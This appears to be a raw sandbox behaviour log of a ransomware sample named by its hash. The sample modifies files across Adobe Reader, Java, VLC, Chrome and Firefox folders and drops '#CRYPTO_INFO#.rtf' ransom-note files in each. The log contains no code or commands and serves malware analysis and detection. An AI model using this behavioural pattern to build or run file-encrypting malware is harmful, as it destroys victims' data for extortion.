DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-tool-view.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\welcome-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.c 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\editpdf.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr_2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jcmd.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jvm.hprof.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jdeps.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_MoveDrop32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\amd64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nl.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\tr_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\pages-app-tool-view.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-hover_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\NetworkServerControl.bat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_bow.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_auditreport_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\NewInvoke.avi 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\policytool.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_agreement_filetype.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-default_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_opencarat_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\rename.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\create_form.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-disabled.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-mac.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoCanary.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2-2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\cross.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\empty.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\require.min.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CollectSignatures.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-exit-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_listview_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar 